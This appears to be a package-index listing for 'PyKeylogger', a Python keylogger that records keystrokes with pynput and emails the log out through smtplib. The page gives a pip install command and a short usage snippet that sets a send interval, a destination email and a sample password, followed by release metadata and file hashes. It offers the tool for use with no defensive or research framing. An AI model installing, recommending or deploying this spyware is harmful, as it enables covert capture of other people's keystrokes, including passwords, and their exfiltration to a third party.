No project description provided
Project description
# A simple keylogger
#### This is a simple keylogger that is built using the libraries: pynput and stmplib, #### and some other built-in modules for sending emails. #### It will record the key and send the log to you through email
## How to install it?
You can do:
“”” pip install Pykeylogger “””
to install pykeylogger…
## How to use it?
code example:
“”” from Pykeylogger import keylogger
logger = keylogger.KeyLogger(interval=50, email=”pykeylogger@pykeylogger.com”, passwd=”Pykeylogger123”) logger.run() “””
simple! interval = how long do you want to wait to send the log of the keys to you email = the email you want to send to log to passwd = password of the email
yeyeyeye! Thank you!
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
File details
Details for the file PyKeyLogger-1.0.tar.gz.
File metadata
- Download URL: PyKeyLogger-1.0.tar.gz
- Upload date:
- Size: 1.1 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/3.2.0 pkginfo/1.5.0.1 requests/2.22.0 setuptools/46.0.0.post20200309 requests-toolbelt/0.9.1 tqdm/4.42.1 CPython/3.7.6
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
a7bf6571951f368bf12a3226645bd0a1a3aa69ef8cdaa8e62e62e59201f80b32
|
|
| MD5 |
aa678db83166e8a7eb65ecae7b3c0ec1
|
|
| BLAKE2b-256 |
f4a0f87c492f874ad01d9c12316774d827bc891b53090164c5b7d5ad697d5e10
|